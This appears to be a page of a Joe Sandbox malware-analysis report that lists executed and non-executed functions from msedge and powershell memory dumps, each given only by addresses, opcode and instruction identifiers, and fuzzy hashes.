                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 92ecb2502fdb5761ab3c584e88bda39d55c28d755168b269b9a3794c14680dea
                                            • Instruction ID: e2bef84528d414c87d09bd8b495361cc0999256798a8f1932965b718aa2ffcbb
                                            • Opcode Fuzzy Hash: 92ecb2502fdb5761ab3c584e88bda39d55c28d755168b269b9a3794c14680dea
                                            • Instruction Fuzzy Hash: 3531E530A1CA1C8FDB58EF9CD8566F9B7E1EB59311F00423ED04ED3251DA74A8128BC1

                                            Executed Functions

                                            Function 00007FFD347339D1 Relevance: 2.8, Strings: 1, Instructions: 1592COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2213346553.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: L_H
                                            • API String ID: 0-402390507
                                            • Opcode ID: ebcfcc9d12ac8ffa146d63485062387245d77192728cf4d6bfc13e52a89d5411
                                            • Instruction ID: 6c71a4b4bd931ffe6056ee9a13708c0ae3534e64c863f6be0d78ebff920bb936
                                            • Opcode Fuzzy Hash: ebcfcc9d12ac8ffa146d63485062387245d77192728cf4d6bfc13e52a89d5411
                                            • Instruction Fuzzy Hash: 8FA20362A0EBC94FE76A972858B51A43FE1EF57210B1901FBD18DCB1A3D91DBC0693C1
                                            Function 00007FFD3473660A Relevance: .5, Instructions: 453COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2213346553.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41705dfd7b8853b1eeb99bf90d9dcd3cb441692e39a70d67f0cb7498bac09f60
                                            • Instruction ID: 09b8adc1ea1ee3d67d3e8feb9ff91e0f92ec88855127b24c4d4235c2288daf6d
                                            • Opcode Fuzzy Hash: 41705dfd7b8853b1eeb99bf90d9dcd3cb441692e39a70d67f0cb7498bac09f60
                                            • Instruction Fuzzy Hash: 70D115B2A0EA898FE7B59B6858B55B57BE0EF17214B2801FED14DC71A3D91CB805C3C1
                                            Function 00007FFD34669EF3 Relevance: .2, Instructions: 232COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212940802.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83ea2ebf9746651896ace9be605d2d4223654092fc866b826b35f5306c9e7dca
                                            • Instruction ID: cb500f506706c10aed768fce3b5a84bf176b881cd33f504da4a628b9bb5cb833
                                            • Opcode Fuzzy Hash: 83ea2ebf9746651896ace9be605d2d4223654092fc866b826b35f5306c9e7dca
                                            • Instruction Fuzzy Hash: 8671E937E0D6A24BD7119F9C9CB10E67B60EF53239B0901B2CAC8DF153EE1865158BD1
                                            Function 00007FFD346696FA Relevance: .2, Instructions: 182COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212940802.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6be8fdbabecde6b0659b93a51d8ed90c26e6a6a9fdbc13da8f1184f7cb8cac62
                                            • Instruction ID: 954982593d263dce382f9e8158bfce3aefa9d652a31a392e1cebe9026aa46ba0
                                            • Opcode Fuzzy Hash: 6be8fdbabecde6b0659b93a51d8ed90c26e6a6a9fdbc13da8f1184f7cb8cac62
                                            • Instruction Fuzzy Hash: FC512B71A0CB854FEB199F5858651F8BFE0FF56320F14417FD449C7192DA28B80A8BC2
                                            Function 00007FFD3454E380 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212505682.00007FFD3454D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3454D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd3454d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10b9cff54ebd98917e56fe99ede6a154c09a08089c5ae12ecb82d46fce5a846f
                                            • Instruction ID: b85848efefa6d5bda913b0b22a0eb2e8120fbba4bcea0d80fc4e65dd9340e1a3
                                            • Opcode Fuzzy Hash: 10b9cff54ebd98917e56fe99ede6a154c09a08089c5ae12ecb82d46fce5a846f
                                            • Instruction Fuzzy Hash: DA41E17190DBC44FE7578B299891A523FF0EF53324B1505EFD088CB1A3D629B846C792
                                            Function 00007FFD3466A47C Relevance: .1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212940802.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c475bd737504955049f0d5c6dc51de9f7975a7019655ce118dd401fef302e9b
                                            • Instruction ID: c55359ccac0f166b16a39f1c8bd5f6223570d4f970c975bf82967b9140bea8aa
                                            • Opcode Fuzzy Hash: 8c475bd737504955049f0d5c6dc51de9f7975a7019655ce118dd401fef302e9b
                                            • Instruction Fuzzy Hash: 9B21F83090C74C8FDB59DFAC9C8A7E97BF0EB9A321F04416BD049C3152DA74A406CB91
                                            Function 00007FFD347340BF Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2213346553.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6ee9b1a0723e277d3e2194b64d0a8952a62f1def8d2826742b7e10dc26aa1d2
                                            • Instruction ID: 2527cb0b0cf3cbb0c2b05319cf7e6949f058d5296bc6c49a4bf664524593a96f
                                            • Opcode Fuzzy Hash: e6ee9b1a0723e277d3e2194b64d0a8952a62f1def8d2826742b7e10dc26aa1d2
                                            • Instruction Fuzzy Hash: 6721D4A3B0DE9A8FE7A9DA1844F117476D2EF66210B6900BAD25DC71A2CD1DFC0593C1
                                            Function 00007FFD347343BC Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2213346553.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfe2d3bd1a87cb675a841e34bf2314d4e8a112e70ce7e8db15721a08c6c48ee0
                                            • Instruction ID: 3878bae231ac5b4c225f913b83e4662db05c1c5491fe5f881e959cd1fc336dd7
                                            • Opcode Fuzzy Hash: cfe2d3bd1a87cb675a841e34bf2314d4e8a112e70ce7e8db15721a08c6c48ee0
                                            • Instruction Fuzzy Hash: 9311E0B3A0E5858FE6A8D71894F45B877E1EF4622476900BAD14DD7193D92DFC1093C1
                                            Function 00007FFD346633B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212940802.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction ID: a87958a79b51de30136d2a5796adff37845468f6d091c294b1e8deaa73d43299
                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                            • Instruction Fuzzy Hash: 9501677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45

                                            Non-executed Functions

                                            Function 00007FFD34668995 Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212940802.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N_^$N_^$N_^$N_^
                                            • API String ID: 0-3900292545
                                            • Opcode ID: 8a9ad283c9fe07f85fbdcb838e024f988e7dc68e7d93a784d91977a16fc1e5d2
                                            • Instruction ID: b918b536bc114e38867635a64abcf216c9a6a8e1d3f01462708aa5ca6d343d9f
                                            • Opcode Fuzzy Hash: 8a9ad283c9fe07f85fbdcb838e024f988e7dc68e7d93a784d91977a16fc1e5d2
                                            • Instruction Fuzzy Hash: 2C4190A3E0E6D21FE3124B294CB51D57FA1EF53324B0E11F6C688CF093EA1C68069792
                                            Function 00007FFD34668BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2212940802.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N_^4$N_^7$N_^F$N_^J
                                            • API String ID: 0-3508309026
                                            • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                            • Instruction ID: be603aa38f986340cf5313dc8a8fb132244078021a9e01a130fd24d974cc3163
                                            • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                            • Instruction Fuzzy Hash: EF2104B7B082255ED3117BFCEC245EA3B44DFA423974502B2D298DB143ED14608A8AC2

                                            Executed Functions

                                            Function 00007FFD347239D1 Relevance: 2.8, Strings: 1, Instructions: 1576COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2324826576.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34720000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_H
                                            • API String ID: 0-372873180
                                            • Opcode ID: 72f6c3f523ca1bc47ea3cabe7aeb3e08bd9b001604bdf17f6aff61ae4ae4e1b7
                                            • Instruction ID: a62511deaa5b9cefd839ab11e57fd27fb2ce6c3c34026e1b1b5f8227fcc1cdac
                                            • Opcode Fuzzy Hash: 72f6c3f523ca1bc47ea3cabe7aeb3e08bd9b001604bdf17f6aff61ae4ae4e1b7
                                            • Instruction Fuzzy Hash: FEA20662B0DBCA4FE7A69B3858A51A43FE1EF57250B0901FBD18DC7193DA1CAC06C391
                                            Function 00007FFD3465644D Relevance: .7, Instructions: 728COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2323760239.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34650000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d35c1f47b2bf37e48db9b7f99c98f8a6ba87f6740cea58c9a1b56cf5dd49a5c5
                                            • Instruction ID: bc7dc894e35d27e693b2cb13d0b5015e49f630257b493666119a93cc964791c1
                                            • Opcode Fuzzy Hash: d35c1f47b2bf37e48db9b7f99c98f8a6ba87f6740cea58c9a1b56cf5dd49a5c5
                                            • Instruction Fuzzy Hash: 72D17F31A08A5D8FDF94DF58C4A5AE97BE1FF69300F1441AAD44DD72A6CA38E841CB81
                                            Function 00007FFD34726605 Relevance: .4, Instructions: 445COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2324826576.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34720000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4e5535b885373fc6cc177d1569f314fb1aee3fe38a7f73646f031b7be73db4d
                                            • Instruction ID: 570d2412d80adf65d53f5fbea629aa421c9e054769b7a438d50d63ac0e6fd5d7
                                            • Opcode Fuzzy Hash: b4e5535b885373fc6cc177d1569f314fb1aee3fe38a7f73646f031b7be73db4d
                                            • Instruction Fuzzy Hash: 6CD137B2A0EB898FE7769B6898A55B57BE0EF16254B0801FFD54CC71E3D91CA805C381
                                            Function 00007FFD34659750 Relevance: .1, Instructions: 145COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2323760239.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34650000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 478e9800c2457e72497db0f8eb3a65a205e53e57f39f6fcbed72fe399ef59e04
                                            • Instruction ID: 863ff9b9879a088fb36ee8b5d3bd456f979b432cf482f889dbdc01ed7661da5d
                                            • Opcode Fuzzy Hash: 478e9800c2457e72497db0f8eb3a65a205e53e57f39f6fcbed72fe399ef59e04
                                            • Instruction Fuzzy Hash: B741277190DB884FDB18DF5C9C5A6E9BFE0FB56310F0441AFE449D3292CA64A809CBC2
                                            Function 00007FFD3453E540 Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2322852312.00007FFD3453D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3453D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd3453d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd4f6fe63b5d3d7cc3e80b91c296953a8d92d06903d48618a2eb660b6e78ffa1
                                            • Instruction ID: abf67ec77a8f835caba7f74b0b992d8643b8dc857479b5bf67f92f1e945ee92d
                                            • Opcode Fuzzy Hash: dd4f6fe63b5d3d7cc3e80b91c296953a8d92d06903d48618a2eb660b6e78ffa1
                                            • Instruction Fuzzy Hash: D841293190DBC44FE7579B3898A5A523FF0EF57324B1906DFD088CB1A3D629A846C792
                                            Function 00007FFD3465A49C Relevance: .1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2323760239.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34650000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13a34f8e7b598417ebe250fa0e4a10813ec1c7ac1a6e79470b886aee14c4ac97
                                            • Instruction ID: 86bd69497c495322890b1ae8ca8835851b51fc7e3a8ef8c5c67d7e9b3be258de
                                            • Opcode Fuzzy Hash: 13a34f8e7b598417ebe250fa0e4a10813ec1c7ac1a6e79470b886aee14c4ac97
                                            • Instruction Fuzzy Hash: 8521E63190CB4C4FDB59DFAC9C8A7E97BE0EB96321F04416BD048C3152DA74A81ACB91
                                            Function 00007FFD347240BF Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2324826576.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34720000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79738c05d7304005304f5c52e37b25e4198c1b14db14a80ecc883d26136dd2af
                                            • Instruction ID: 1e100190588e957100b585cce08e55ed8be1dc7d70ec372d7a6d2ac8c62ffb37
                                            • Opcode Fuzzy Hash: 79738c05d7304005304f5c52e37b25e4198c1b14db14a80ecc883d26136dd2af
                                            • Instruction Fuzzy Hash: BD2125B3B0DA9A8FF7A5CA1844E017036D2EF66290B5900BAC25DD71A3CE2CFC059381
                                            Function 00007FFD347243BC Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2324826576.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34720000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e55e48f856d3dadfde8dd66e98f7be10a831fcd003f9d0cf36817eabe256803
                                            • Instruction ID: 56dc9a00faeaaf0be8cf4adacdca546e496c28b51adc9b71327e1d82ba403c4b
                                            • Opcode Fuzzy Hash: 4e55e48f856d3dadfde8dd66e98f7be10a831fcd003f9d0cf36817eabe256803
                                            • Instruction Fuzzy Hash: 7D1102B2F0E9858FE7A5D71894E45B87BE1EF462A475900FAD14DD7193DA2CBC0093C1
                                            Function 00007FFD346533B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2323760239.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34650000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                            • Instruction ID: a7b3ec9e85f60c887bf1ab583759d59287a80f7d629e4d15af53f6682909c868
                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                            • Instruction Fuzzy Hash: 3601677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45

                                            Non-executed Functions

                                            Function 00007FFD34658BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2323760239.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_7ffd34650000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
                                            • API String ID: 0-3814653101
                                            • Opcode ID: 049ef812df7fd761601f28dd96fc4d10cb6a864f10ec31d3fde299ba9228c6b6
                                            • Instruction ID: 8821af858222971e660ef698ac2f061e9ef4b985b10a20d93d98aa0d4e0f6429
                                            • Opcode Fuzzy Hash: 049ef812df7fd761601f28dd96fc4d10cb6a864f10ec31d3fde299ba9228c6b6
                                            • Instruction Fuzzy Hash: 9C2122B3B186114AC21236FCB8415EA2784DFE437B34901F3E05DEF303CD18A48B8A80

                                            Executed Functions

                                            Function 00007FFD3474660A Relevance: .4, Instructions: 435COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c6157570998a0018b918e3e242808e866a405daf8c54ab0f49b9e02293d63bb
                                            • Instruction ID: 3f88175a9b54415ab7ad2d4f93b9c9ad08038ab2c4d6a42c032f1bae396b5602
                                            • Opcode Fuzzy Hash: 6c6157570998a0018b918e3e242808e866a405daf8c54ab0f49b9e02293d63bb
                                            • Instruction Fuzzy Hash: 0CD127B2A0DA898FE7B5AB6858A55B57BE4EF16314B0801FED54CC72E3D91CF805C381
                                            Function 00007FFD34744033 Relevance: .4, Instructions: 387COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 135969843f4185b02a425be9bb35db97d4f50345d0cf6610b2b48114e593cf25
                                            • Instruction ID: 54a2b91b676bbd15a27ed10e6bf0738c6eb0760c43e8c1f9e8973a0408933bdc
                                            • Opcode Fuzzy Hash: 135969843f4185b02a425be9bb35db97d4f50345d0cf6610b2b48114e593cf25
                                            • Instruction Fuzzy Hash: 8AB10562A0DBC68FE766862848A51B47FE1EF97210B0901FBD18DC72A3DD1DAC06D381
                                            Function 00007FFD3474432B Relevance: .3, Instructions: 341COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0aa3ed381efb23db7c378e79fef85c978d07c8293d3370c2f904697f9485dbb5
                                            • Instruction ID: b9cb91115e3dfb5ca129245564f41bb01e07744274691d32408330fa7d74e120
                                            • Opcode Fuzzy Hash: 0aa3ed381efb23db7c378e79fef85c978d07c8293d3370c2f904697f9485dbb5
                                            • Instruction Fuzzy Hash: 76A13871A0E7C94FE766972848A95B47FE0EF47610B0901FBD18DDB293D918BC06E392
                                            Function 00007FFD3474664B Relevance: .3, Instructions: 254COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f757ab44ab6fec30af0360cc5cc9f3bed5980174babf9f3a2baf2fcee81d14ff
                                            • Instruction ID: fb8a494d3e44725fbc15a2cd4049470949b3952e60b71f9aef575f17d1c62ad5
                                            • Opcode Fuzzy Hash: f757ab44ab6fec30af0360cc5cc9f3bed5980174babf9f3a2baf2fcee81d14ff
                                            • Instruction Fuzzy Hash: 0081D2A2A0EB868FE7B6962848B51747BD1AF12314B5800FEC54DCB2E3D91DBC059381
                                            Function 00007FFD3467A120 Relevance: .2, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c33c85393600675e9656f1c79287923673bd94f6b8b93f83fb7e9b65b820dd22
                                            • Instruction ID: 8c32af9b0d7dc3456965e11e503ec48aec70603b520eca18753f0ce3d2b4986a
                                            • Opcode Fuzzy Hash: c33c85393600675e9656f1c79287923673bd94f6b8b93f83fb7e9b65b820dd22
                                            • Instruction Fuzzy Hash: 88F0E235908A8C8FCB42DF2898690E43FF0EF26201B0441DBE848C7061DB229808C7C1
                                            Function 00007FFD34679758 Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f39aaa02933198a8f9f4ecff7be09cbb78689cf9bd4973fe0a396d10aae0c915
                                            • Instruction ID: b8e7663c364c1c4d2adce2dc46c6f4a2b8b945a64ad39a3c0a72a7cc18a84070
                                            • Opcode Fuzzy Hash: f39aaa02933198a8f9f4ecff7be09cbb78689cf9bd4973fe0a396d10aae0c915
                                            • Instruction Fuzzy Hash: D9310931A1CB489FDB189F5C984A6B97BE0FB99310F00412FE449D3252DA24A816CBC2
                                            Function 00007FFD3455F360 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2476143228.00007FFD3455D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3455D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd3455d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b24180070a45313d4cbd3bfc1e089b1aff798fb3aafd029a28aa9b90bbd6697
                                            • Instruction ID: 03d777cb7bad9a80925360539d1546b6d4691724847e4ba2fea4aa4fd48d702a
                                            • Opcode Fuzzy Hash: 7b24180070a45313d4cbd3bfc1e089b1aff798fb3aafd029a28aa9b90bbd6697
                                            • Instruction Fuzzy Hash: AE41157190DBC44FE7578B2898959623FF0EF57320B1505DFD088CB1A7D629E846C7A2
                                            Function 00007FFD3467A62C Relevance: .1, Instructions: 99COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f76b79323a09b7b6bcf2e56423b1fff90b154321f605f06c042000c0a4b7d0b2
                                            • Instruction ID: fd67157214bed037ee897f90e2d0518e99e9fe2040c3ca52ac410fdc3ac092de
                                            • Opcode Fuzzy Hash: f76b79323a09b7b6bcf2e56423b1fff90b154321f605f06c042000c0a4b7d0b2
                                            • Instruction Fuzzy Hash: 5A21E631A0CB4C8FDB59DFAC9C8A6E97FF0EB96321F04416BD448C3152DA759416CB92
                                            Function 00007FFD347440BF Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba6dc08fcef69ca27ed5b2d4a469743c4135739a719aaace6ac8c5f07c06fc61
                                            • Instruction ID: f63ffa33ae7809745c186084a48c7ed08821c11ffacf02146127e82296d16a43
                                            • Opcode Fuzzy Hash: ba6dc08fcef69ca27ed5b2d4a469743c4135739a719aaace6ac8c5f07c06fc61
                                            • Instruction Fuzzy Hash: D32109B2B0DA9A8FE7A5CB1C44E013476D2EF66210B5900BAC25EC73A3CD1CFC05A381
                                            Function 00007FFD347443BC Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2478365148.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34740000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cc0fa9ba8dab7deccec2b2ff4a36b0f18a6bbc8d181e13760542a4533837fff
